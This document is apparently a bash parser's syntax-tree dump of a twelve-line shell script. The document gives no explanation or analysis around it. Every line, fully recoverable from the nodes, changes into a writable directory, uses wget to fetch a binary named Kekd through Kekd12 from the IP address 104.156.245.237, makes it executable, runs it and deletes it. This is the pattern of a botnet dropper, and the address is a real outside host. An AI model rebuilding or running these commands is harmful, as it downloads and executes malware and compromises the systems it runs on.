ListNode(lineno=2, pos=(12, 135), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://104.156.245.237/Kekd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 114), parts=[
    WordNode(lineno=2, pos=(101, 106), word='chmod'),
    WordNode(lineno=2, pos=(107, 109), word='+x'),
    WordNode(lineno=2, pos=(110, 114), word='Kekd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(114, 115)),
  CommandNode(lineno=2, pos=(116, 122), parts=[
    WordNode(lineno=2, pos=(116, 122), word='./Kekd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 135), parts=[
    WordNode(lineno=2, pos=(124, 126), word='rm'),
    WordNode(lineno=2, pos=(127, 130), word='-rf'),
    WordNode(lineno=2, pos=(131, 135), word='Kekd'),
  ]),
])
ListNode(lineno=3, pos=(136, 263), parts=[
  CommandNode(lineno=3, pos=(136, 143), parts=[
    WordNode(lineno=3, pos=(136, 138), word='cd'),
    WordNode(lineno=3, pos=(139, 143), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(144, 146)),
  CommandNode(lineno=3, pos=(147, 158), parts=[
    WordNode(lineno=3, pos=(147, 149), word='cd'),
    WordNode(lineno=3, pos=(150, 158), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 169), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 169), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(170, 172)),
  CommandNode(lineno=3, pos=(173, 181), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 181), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 189), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 189), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(189, 190)),
  CommandNode(lineno=3, pos=(191, 224), parts=[
    WordNode(lineno=3, pos=(191, 195), word='wget'),
    WordNode(lineno=3, pos=(196, 224), word='http://104.156.245.237/Kekd2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 240), parts=[
    WordNode(lineno=3, pos=(226, 231), word='chmod'),
    WordNode(lineno=3, pos=(232, 234), word='+x'),
    WordNode(lineno=3, pos=(235, 240), word='Kekd2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 249), parts=[
    WordNode(lineno=3, pos=(242, 249), word='./Kekd2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 263), parts=[
    WordNode(lineno=3, pos=(251, 253), word='rm'),
    WordNode(lineno=3, pos=(254, 257), word='-rf'),
    WordNode(lineno=3, pos=(258, 263), word='Kekd2'),
  ]),
])
ListNode(lineno=4, pos=(264, 391), parts=[
  CommandNode(lineno=4, pos=(264, 271), parts=[
    WordNode(lineno=4, pos=(264, 266), word='cd'),
    WordNode(lineno=4, pos=(267, 271), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(272, 274)),
  CommandNode(lineno=4, pos=(275, 286), parts=[
    WordNode(lineno=4, pos=(275, 277), word='cd'),
    WordNode(lineno=4, pos=(278, 286), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(287, 289)),
  CommandNode(lineno=4, pos=(290, 297), parts=[
    WordNode(lineno=4, pos=(290, 292), word='cd'),
    WordNode(lineno=4, pos=(293, 297), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 309), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 309), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(310, 312)),
  CommandNode(lineno=4, pos=(313, 317), parts=[
    WordNode(lineno=4, pos=(313, 315), word='cd'),
    WordNode(lineno=4, pos=(316, 317), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(317, 318)),
  CommandNode(lineno=4, pos=(319, 352), parts=[
    WordNode(lineno=4, pos=(319, 323), word='wget'),
    WordNode(lineno=4, pos=(324, 352), word='http://104.156.245.237/Kekd3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(352, 353)),
  CommandNode(lineno=4, pos=(354, 368), parts=[
    WordNode(lineno=4, pos=(354, 359), word='chmod'),
    WordNode(lineno=4, pos=(360, 362), word='+x'),
    WordNode(lineno=4, pos=(363, 368), word='Kekd3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(368, 369)),
  CommandNode(lineno=4, pos=(370, 377), parts=[
    WordNode(lineno=4, pos=(370, 377), word='./Kekd3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(377, 378)),
  CommandNode(lineno=4, pos=(379, 391), parts=[
    WordNode(lineno=4, pos=(379, 381), word='rm'),
    WordNode(lineno=4, pos=(382, 385), word='-rf'),
    WordNode(lineno=4, pos=(386, 391), word='Kekd3'),
  ]),
])
ListNode(lineno=5, pos=(392, 519), parts=[
  CommandNode(lineno=5, pos=(392, 399), parts=[
    WordNode(lineno=5, pos=(392, 394), word='cd'),
    WordNode(lineno=5, pos=(395, 399), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(400, 402)),
  CommandNode(lineno=5, pos=(403, 414), parts=[
    WordNode(lineno=5, pos=(403, 405), word='cd'),
    WordNode(lineno=5, pos=(406, 414), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(415, 417)),
  CommandNode(lineno=5, pos=(418, 425), parts=[
    WordNode(lineno=5, pos=(418, 420), word='cd'),
    WordNode(lineno=5, pos=(421, 425), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(426, 428)),
  CommandNode(lineno=5, pos=(429, 437), parts=[
    WordNode(lineno=5, pos=(429, 431), word='cd'),
    WordNode(lineno=5, pos=(432, 437), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(438, 440)),
  CommandNode(lineno=5, pos=(441, 445), parts=[
    WordNode(lineno=5, pos=(441, 443), word='cd'),
    WordNode(lineno=5, pos=(444, 445), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(445, 446)),
  CommandNode(lineno=5, pos=(447, 480), parts=[
    WordNode(lineno=5, pos=(447, 451), word='wget'),
    WordNode(lineno=5, pos=(452, 480), word='http://104.156.245.237/Kekd4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(480, 481)),
  CommandNode(lineno=5, pos=(482, 496), parts=[
    WordNode(lineno=5, pos=(482, 487), word='chmod'),
    WordNode(lineno=5, pos=(488, 490), word='+x'),
    WordNode(lineno=5, pos=(491, 496), word='Kekd4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(496, 497)),
  CommandNode(lineno=5, pos=(498, 505), parts=[
    WordNode(lineno=5, pos=(498, 505), word='./Kekd4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(505, 506)),
  CommandNode(lineno=5, pos=(507, 519), parts=[
    WordNode(lineno=5, pos=(507, 509), word='rm'),
    WordNode(lineno=5, pos=(510, 513), word='-rf'),
    WordNode(lineno=5, pos=(514, 519), word='Kekd4'),
  ]),
])
ListNode(lineno=6, pos=(520, 647), parts=[
  CommandNode(lineno=6, pos=(520, 527), parts=[
    WordNode(lineno=6, pos=(520, 522), word='cd'),
    WordNode(lineno=6, pos=(523, 527), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(528, 530)),
  CommandNode(lineno=6, pos=(531, 542), parts=[
    WordNode(lineno=6, pos=(531, 533), word='cd'),
    WordNode(lineno=6, pos=(534, 542), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(543, 545)),
  CommandNode(lineno=6, pos=(546, 553), parts=[
    WordNode(lineno=6, pos=(546, 548), word='cd'),
    WordNode(lineno=6, pos=(549, 553), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(554, 556)),
  CommandNode(lineno=6, pos=(557, 565), parts=[
    WordNode(lineno=6, pos=(557, 559), word='cd'),
    WordNode(lineno=6, pos=(560, 565), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(566, 568)),
  CommandNode(lineno=6, pos=(569, 573), parts=[
    WordNode(lineno=6, pos=(569, 571), word='cd'),
    WordNode(lineno=6, pos=(572, 573), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(573, 574)),
  CommandNode(lineno=6, pos=(575, 608), parts=[
    WordNode(lineno=6, pos=(575, 579), word='wget'),
    WordNode(lineno=6, pos=(580, 608), word='http://104.156.245.237/Kekd5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(608, 609)),
  CommandNode(lineno=6, pos=(610, 624), parts=[
    WordNode(lineno=6, pos=(610, 615), word='chmod'),
    WordNode(lineno=6, pos=(616, 618), word='+x'),
    WordNode(lineno=6, pos=(619, 624), word='Kekd5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(624, 625)),
  CommandNode(lineno=6, pos=(626, 633), parts=[
    WordNode(lineno=6, pos=(626, 633), word='./Kekd5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(633, 634)),
  CommandNode(lineno=6, pos=(635, 647), parts=[
    WordNode(lineno=6, pos=(635, 637), word='rm'),
    WordNode(lineno=6, pos=(638, 641), word='-rf'),
    WordNode(lineno=6, pos=(642, 647), word='Kekd5'),
  ]),
])
ListNode(lineno=7, pos=(648, 775), parts=[
  CommandNode(lineno=7, pos=(648, 655), parts=[
    WordNode(lineno=7, pos=(648, 650), word='cd'),
    WordNode(lineno=7, pos=(651, 655), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(656, 658)),
  CommandNode(lineno=7, pos=(659, 670), parts=[
    WordNode(lineno=7, pos=(659, 661), word='cd'),
    WordNode(lineno=7, pos=(662, 670), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(671, 673)),
  CommandNode(lineno=7, pos=(674, 681), parts=[
    WordNode(lineno=7, pos=(674, 676), word='cd'),
    WordNode(lineno=7, pos=(677, 681), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(682, 684)),
  CommandNode(lineno=7, pos=(685, 693), parts=[
    WordNode(lineno=7, pos=(685, 687), word='cd'),
    WordNode(lineno=7, pos=(688, 693), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(694, 696)),
  CommandNode(lineno=7, pos=(697, 701), parts=[
    WordNode(lineno=7, pos=(697, 699), word='cd'),
    WordNode(lineno=7, pos=(700, 701), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(701, 702)),
  CommandNode(lineno=7, pos=(703, 736), parts=[
    WordNode(lineno=7, pos=(703, 707), word='wget'),
    WordNode(lineno=7, pos=(708, 736), word='http://104.156.245.237/Kekd6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(736, 737)),
  CommandNode(lineno=7, pos=(738, 752), parts=[
    WordNode(lineno=7, pos=(738, 743), word='chmod'),
    WordNode(lineno=7, pos=(744, 746), word='+x'),
    WordNode(lineno=7, pos=(747, 752), word='Kekd6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(752, 753)),
  CommandNode(lineno=7, pos=(754, 761), parts=[
    WordNode(lineno=7, pos=(754, 761), word='./Kekd6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(761, 762)),
  CommandNode(lineno=7, pos=(763, 775), parts=[
    WordNode(lineno=7, pos=(763, 765), word='rm'),
    WordNode(lineno=7, pos=(766, 769), word='-rf'),
    WordNode(lineno=7, pos=(770, 775), word='Kekd6'),
  ]),
])
ListNode(lineno=8, pos=(776, 903), parts=[
  CommandNode(lineno=8, pos=(776, 783), parts=[
    WordNode(lineno=8, pos=(776, 778), word='cd'),
    WordNode(lineno=8, pos=(779, 783), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(784, 786)),
  CommandNode(lineno=8, pos=(787, 798), parts=[
    WordNode(lineno=8, pos=(787, 789), word='cd'),
    WordNode(lineno=8, pos=(790, 798), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(799, 801)),
  CommandNode(lineno=8, pos=(802, 809), parts=[
    WordNode(lineno=8, pos=(802, 804), word='cd'),
    WordNode(lineno=8, pos=(805, 809), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(810, 812)),
  CommandNode(lineno=8, pos=(813, 821), parts=[
    WordNode(lineno=8, pos=(813, 815), word='cd'),
    WordNode(lineno=8, pos=(816, 821), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(822, 824)),
  CommandNode(lineno=8, pos=(825, 829), parts=[
    WordNode(lineno=8, pos=(825, 827), word='cd'),
    WordNode(lineno=8, pos=(828, 829), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(829, 830)),
  CommandNode(lineno=8, pos=(831, 864), parts=[
    WordNode(lineno=8, pos=(831, 835), word='wget'),
    WordNode(lineno=8, pos=(836, 864), word='http://104.156.245.237/Kekd7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(864, 865)),
  CommandNode(lineno=8, pos=(866, 880), parts=[
    WordNode(lineno=8, pos=(866, 871), word='chmod'),
    WordNode(lineno=8, pos=(872, 874), word='+x'),
    WordNode(lineno=8, pos=(875, 880), word='Kekd7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(880, 881)),
  CommandNode(lineno=8, pos=(882, 889), parts=[
    WordNode(lineno=8, pos=(882, 889), word='./Kekd7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(889, 890)),
  CommandNode(lineno=8, pos=(891, 903), parts=[
    WordNode(lineno=8, pos=(891, 893), word='rm'),
    WordNode(lineno=8, pos=(894, 897), word='-rf'),
    WordNode(lineno=8, pos=(898, 903), word='Kekd7'),
  ]),
])
ListNode(lineno=9, pos=(904, 1031), parts=[
  CommandNode(lineno=9, pos=(904, 911), parts=[
    WordNode(lineno=9, pos=(904, 906), word='cd'),
    WordNode(lineno=9, pos=(907, 911), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(912, 914)),
  CommandNode(lineno=9, pos=(915, 926), parts=[
    WordNode(lineno=9, pos=(915, 917), word='cd'),
    WordNode(lineno=9, pos=(918, 926), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(927, 929)),
  CommandNode(lineno=9, pos=(930, 937), parts=[
    WordNode(lineno=9, pos=(930, 932), word='cd'),
    WordNode(lineno=9, pos=(933, 937), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(938, 940)),
  CommandNode(lineno=9, pos=(941, 949), parts=[
    WordNode(lineno=9, pos=(941, 943), word='cd'),
    WordNode(lineno=9, pos=(944, 949), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(950, 952)),
  CommandNode(lineno=9, pos=(953, 957), parts=[
    WordNode(lineno=9, pos=(953, 955), word='cd'),
    WordNode(lineno=9, pos=(956, 957), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(957, 958)),
  CommandNode(lineno=9, pos=(959, 992), parts=[
    WordNode(lineno=9, pos=(959, 963), word='wget'),
    WordNode(lineno=9, pos=(964, 992), word='http://104.156.245.237/Kekd8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(992, 993)),
  CommandNode(lineno=9, pos=(994, 1008), parts=[
    WordNode(lineno=9, pos=(994, 999), word='chmod'),
    WordNode(lineno=9, pos=(1000, 1002), word='+x'),
    WordNode(lineno=9, pos=(1003, 1008), word='Kekd8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1008, 1009)),
  CommandNode(lineno=9, pos=(1010, 1017), parts=[
    WordNode(lineno=9, pos=(1010, 1017), word='./Kekd8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1017, 1018)),
  CommandNode(lineno=9, pos=(1019, 1031), parts=[
    WordNode(lineno=9, pos=(1019, 1021), word='rm'),
    WordNode(lineno=9, pos=(1022, 1025), word='-rf'),
    WordNode(lineno=9, pos=(1026, 1031), word='Kekd8'),
  ]),
])
ListNode(lineno=10, pos=(1032, 1159), parts=[
  CommandNode(lineno=10, pos=(1032, 1039), parts=[
    WordNode(lineno=10, pos=(1032, 1034), word='cd'),
    WordNode(lineno=10, pos=(1035, 1039), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1040, 1042)),
  CommandNode(lineno=10, pos=(1043, 1054), parts=[
    WordNode(lineno=10, pos=(1043, 1045), word='cd'),
    WordNode(lineno=10, pos=(1046, 1054), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1055, 1057)),
  CommandNode(lineno=10, pos=(1058, 1065), parts=[
    WordNode(lineno=10, pos=(1058, 1060), word='cd'),
    WordNode(lineno=10, pos=(1061, 1065), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1066, 1068)),
  CommandNode(lineno=10, pos=(1069, 1077), parts=[
    WordNode(lineno=10, pos=(1069, 1071), word='cd'),
    WordNode(lineno=10, pos=(1072, 1077), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1078, 1080)),
  CommandNode(lineno=10, pos=(1081, 1085), parts=[
    WordNode(lineno=10, pos=(1081, 1083), word='cd'),
    WordNode(lineno=10, pos=(1084, 1085), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1085, 1086)),
  CommandNode(lineno=10, pos=(1087, 1120), parts=[
    WordNode(lineno=10, pos=(1087, 1091), word='wget'),
    WordNode(lineno=10, pos=(1092, 1120), word='http://104.156.245.237/Kekd9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1120, 1121)),
  CommandNode(lineno=10, pos=(1122, 1136), parts=[
    WordNode(lineno=10, pos=(1122, 1127), word='chmod'),
    WordNode(lineno=10, pos=(1128, 1130), word='+x'),
    WordNode(lineno=10, pos=(1131, 1136), word='Kekd9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1136, 1137)),
  CommandNode(lineno=10, pos=(1138, 1145), parts=[
    WordNode(lineno=10, pos=(1138, 1145), word='./Kekd9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1145, 1146)),
  CommandNode(lineno=10, pos=(1147, 1159), parts=[
    WordNode(lineno=10, pos=(1147, 1149), word='rm'),
    WordNode(lineno=10, pos=(1150, 1153), word='-rf'),
    WordNode(lineno=10, pos=(1154, 1159), word='Kekd9'),
  ]),
])
ListNode(lineno=11, pos=(1160, 1291), parts=[
  CommandNode(lineno=11, pos=(1160, 1167), parts=[
    WordNode(lineno=11, pos=(1160, 1162), word='cd'),
    WordNode(lineno=11, pos=(1163, 1167), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1168, 1170)),
  CommandNode(lineno=11, pos=(1171, 1182), parts=[
    WordNode(lineno=11, pos=(1171, 1173), word='cd'),
    WordNode(lineno=11, pos=(1174, 1182), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1183, 1185)),
  CommandNode(lineno=11, pos=(1186, 1193), parts=[
    WordNode(lineno=11, pos=(1186, 1188), word='cd'),
    WordNode(lineno=11, pos=(1189, 1193), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1194, 1196)),
  CommandNode(lineno=11, pos=(1197, 1205), parts=[
    WordNode(lineno=11, pos=(1197, 1199), word='cd'),
    WordNode(lineno=11, pos=(1200, 1205), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1206, 1208)),
  CommandNode(lineno=11, pos=(1209, 1213), parts=[
    WordNode(lineno=11, pos=(1209, 1211), word='cd'),
    WordNode(lineno=11, pos=(1212, 1213), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1213, 1214)),
  CommandNode(lineno=11, pos=(1215, 1249), parts=[
    WordNode(lineno=11, pos=(1215, 1219), word='wget'),
    WordNode(lineno=11, pos=(1220, 1249), word='http://104.156.245.237/Kekd10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1249, 1250)),
  CommandNode(lineno=11, pos=(1251, 1266), parts=[
    WordNode(lineno=11, pos=(1251, 1256), word='chmod'),
    WordNode(lineno=11, pos=(1257, 1259), word='+x'),
    WordNode(lineno=11, pos=(1260, 1266), word='Kekd10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1266, 1267)),
  CommandNode(lineno=11, pos=(1268, 1276), parts=[
    WordNode(lineno=11, pos=(1268, 1276), word='./Kekd10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1276, 1277)),
  CommandNode(lineno=11, pos=(1278, 1291), parts=[
    WordNode(lineno=11, pos=(1278, 1280), word='rm'),
    WordNode(lineno=11, pos=(1281, 1284), word='-rf'),
    WordNode(lineno=11, pos=(1285, 1291), word='Kekd10'),
  ]),
])
ListNode(lineno=12, pos=(1292, 1423), parts=[
  CommandNode(lineno=12, pos=(1292, 1299), parts=[
    WordNode(lineno=12, pos=(1292, 1294), word='cd'),
    WordNode(lineno=12, pos=(1295, 1299), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1300, 1302)),
  CommandNode(lineno=12, pos=(1303, 1314), parts=[
    WordNode(lineno=12, pos=(1303, 1305), word='cd'),
    WordNode(lineno=12, pos=(1306, 1314), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1315, 1317)),
  CommandNode(lineno=12, pos=(1318, 1325), parts=[
    WordNode(lineno=12, pos=(1318, 1320), word='cd'),
    WordNode(lineno=12, pos=(1321, 1325), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1326, 1328)),
  CommandNode(lineno=12, pos=(1329, 1337), parts=[
    WordNode(lineno=12, pos=(1329, 1331), word='cd'),
    WordNode(lineno=12, pos=(1332, 1337), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1338, 1340)),
  CommandNode(lineno=12, pos=(1341, 1345), parts=[
    WordNode(lineno=12, pos=(1341, 1343), word='cd'),
    WordNode(lineno=12, pos=(1344, 1345), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1345, 1346)),
  CommandNode(lineno=12, pos=(1347, 1381), parts=[
    WordNode(lineno=12, pos=(1347, 1351), word='wget'),
    WordNode(lineno=12, pos=(1352, 1381), word='http://104.156.245.237/Kekd11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1381, 1382)),
  CommandNode(lineno=12, pos=(1383, 1398), parts=[
    WordNode(lineno=12, pos=(1383, 1388), word='chmod'),
    WordNode(lineno=12, pos=(1389, 1391), word='+x'),
    WordNode(lineno=12, pos=(1392, 1398), word='Kekd11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1398, 1399)),
  CommandNode(lineno=12, pos=(1400, 1408), parts=[
    WordNode(lineno=12, pos=(1400, 1408), word='./Kekd11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1408, 1409)),
  CommandNode(lineno=12, pos=(1410, 1423), parts=[
    WordNode(lineno=12, pos=(1410, 1412), word='rm'),
    WordNode(lineno=12, pos=(1413, 1416), word='-rf'),
    WordNode(lineno=12, pos=(1417, 1423), word='Kekd11'),
  ]),
])
ListNode(lineno=13, pos=(1424, 1555), parts=[
  CommandNode(lineno=13, pos=(1424, 1431), parts=[
    WordNode(lineno=13, pos=(1424, 1426), word='cd'),
    WordNode(lineno=13, pos=(1427, 1431), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1432, 1434)),
  CommandNode(lineno=13, pos=(1435, 1446), parts=[
    WordNode(lineno=13, pos=(1435, 1437), word='cd'),
    WordNode(lineno=13, pos=(1438, 1446), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1447, 1449)),
  CommandNode(lineno=13, pos=(1450, 1457), parts=[
    WordNode(lineno=13, pos=(1450, 1452), word='cd'),
    WordNode(lineno=13, pos=(1453, 1457), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1458, 1460)),
  CommandNode(lineno=13, pos=(1461, 1469), parts=[
    WordNode(lineno=13, pos=(1461, 1463), word='cd'),
    WordNode(lineno=13, pos=(1464, 1469), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1470, 1472)),
  CommandNode(lineno=13, pos=(1473, 1477), parts=[
    WordNode(lineno=13, pos=(1473, 1475), word='cd'),
    WordNode(lineno=13, pos=(1476, 1477), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1477, 1478)),
  CommandNode(lineno=13, pos=(1479, 1513), parts=[
    WordNode(lineno=13, pos=(1479, 1483), word='wget'),
    WordNode(lineno=13, pos=(1484, 1513), word='http://104.156.245.237/Kekd12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1513, 1514)),
  CommandNode(lineno=13, pos=(1515, 1530), parts=[
    WordNode(lineno=13, pos=(1515, 1520), word='chmod'),
    WordNode(lineno=13, pos=(1521, 1523), word='+x'),
    WordNode(lineno=13, pos=(1524, 1530), word='Kekd12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1530, 1531)),
  CommandNode(lineno=13, pos=(1532, 1540), parts=[
    WordNode(lineno=13, pos=(1532, 1540), word='./Kekd12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1540, 1541)),
  CommandNode(lineno=13, pos=(1542, 1555), parts=[
    WordNode(lineno=13, pos=(1542, 1544), word='rm'),
    WordNode(lineno=13, pos=(1545, 1548), word='-rf'),
    WordNode(lineno=13, pos=(1549, 1555), word='Kekd12'),
  ]),
])
